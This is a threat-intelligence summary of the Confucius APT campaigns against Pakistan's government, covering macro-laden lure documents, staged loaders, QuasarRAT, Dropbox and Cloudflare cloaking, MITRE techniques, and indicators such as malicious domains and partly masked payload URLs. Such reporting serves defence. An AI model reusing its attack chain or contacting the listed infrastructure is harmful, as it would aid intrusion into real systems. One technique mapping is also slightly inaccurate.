Confucius：隐藏在CloudFlare下的垂钓者

Confucius, an Indian APT group, has targeted Pakistan’s government and military since 2021 using spearphishing attachments and counterfeit government portals to deliver multi-stage loaders. The operation leverages QuasarRAT and bespoke C++/C# backdoors, delivered via Office macros and various downloaders, while relying on Dropbox storage, Branch deep links, and Cloudflare to hide infrastructure and complicate analysis. #Confucius #QuasarRAT #BranchIO #Dropbox #SideWinder #DeMnu #Pakistan

Keypoints

Confucius has conducted sustained attacks against Pakistan’s government and military, beginning in 2021, using spearphishing emails and lure documents tied to government-related topics.
Initial access is achieved with malicious Word/Excel macros that drop a multi-stage loader chain (Stage 1–Stage 4) including QuasarRAT, self-developed backdoors, and JScript/VBScript downloaders.
Attackers cloak operations via cloud storage (Dropbox), deep links (Branch), and Cloudflare to obscure origin, limit access by geography, and encrypt/macros to hinder analysis.
Persistence and execution leverage Windows Task Scheduler, registry Run keys, PowerShell, CMD, Mshta, and JScript/VBScript for staged payload deployment and execution.
The malware family includes both open-source components (QuasarRAT) and custom loaders/backdoors (C#, C++), with extensive data collection, Credential Theft, and file exfiltration features.
Attribution links Confucius activity to SideWinder through overlapping LNK artifacts and infrastructure sharing; DeMnu obfuscators are also involved in some samples.
Pakistani NTISB and government advisories have警示ed about phishing campaigns impersonating the PMO to deter public officials from disclosing information.

MITRE Techniques

[T1566.001] Phishing: Spearphishing Attachment – The attackers “伪装成巴基斯坦政府工作人员向目标投递鱼叉式钓鱼邮件…下载、打开嵌入恶意宏代码的文档” (posing as government staff to deliver spearphishing emails with malicious macro documents).
[T1059.001] PowerShell – “通过系统工具PowerShell加载恶意载荷” (load payloads using PowerShell).
[T1059.005] VBScript – “VBScript” used as part of downloaders and payload delivery.
[T1059.007] JScript – “JScript下载者木马会根据浏览器内核信息…执行命令” (JScript downloader used to load subsequent payloads based on OS).
[T1218.005] Signed Binary Proxy Execution: Mshta – “利用MSHTA执行远程HTA脚本” (Mshta used to run remote HTA).
[T1027] Obfuscated/Compressed Files and Information – “对恶意宏文档进行加密…密码在邮件正文、PDF正文以及钓鱼网站页面中” (encrypted macro payloads).
[T1105] Ingress Tool Transfer – “下载恶意载荷…下载包含恶意宏的文档” (downloading payloads via malicious links).
[T1567.002] Exfiltration to Cloud Storage – “恶意载荷存放在Dropbox网盘等第三方云存储服务” (payloads hosted on cloud storage).
[T1090] Proxy – “CloudFlare CDN加速服务…隐藏域名真实IP地址” (use of CloudFlare to obscure origin).
[T1071.001] Web Protocols – “C2使用HTTP/HTTPS等应用层协议” (C2 communications over web protocols).
[T1053.005] Scheduled Task – “创建计划任务…持久化执行C#窃密木马、C++后门木马” (use of scheduled tasks for persistence).
[T1547.001] Boot or Logon Autostart: Registry Run Keys – “注册表运行键来执行C++后门木马” (registry Run Keys for persistence).
[T1012] Registry Discovery – “检索注册表信息” (querying registry for info).
[T1083] File and Directory Discovery – “检索磁盘驱动器信息、检索符合条件的文件” (discovering files/directories).
[T1135] Network Share Discovery – “检索网络共享” (discovering network shares).

Indicators of Compromise

[MD5] – Malicious documents/backdoors – 41CDCEC8311F735E1ED8D3BAB9192173, 06B5A67BF37FED5B92C2211F342D7F0A
[Domain] – Malicious infrastructure domains – pmogov.info, pmogov.online, ndu-edu.digital, psca-gop-pk.digital
[URL] – Malicious links used to host/load payloads – http://185.203.*.42/uphta/z.vbs, http://classcentral-*.ddns.net/TNC/Class_Central.zip
[File] – Suspected weaponized documents – SRIU-AppForm.docm, FBR5323-Notice.xlsm
[LNK] – Malicious shortcut – WhatsApp.jpeg.lnk
[Disk Identifier] – Drive/volume fingerprint used in samples – 29ebe0d2-885f-4b6f-9277-80f9904dafe4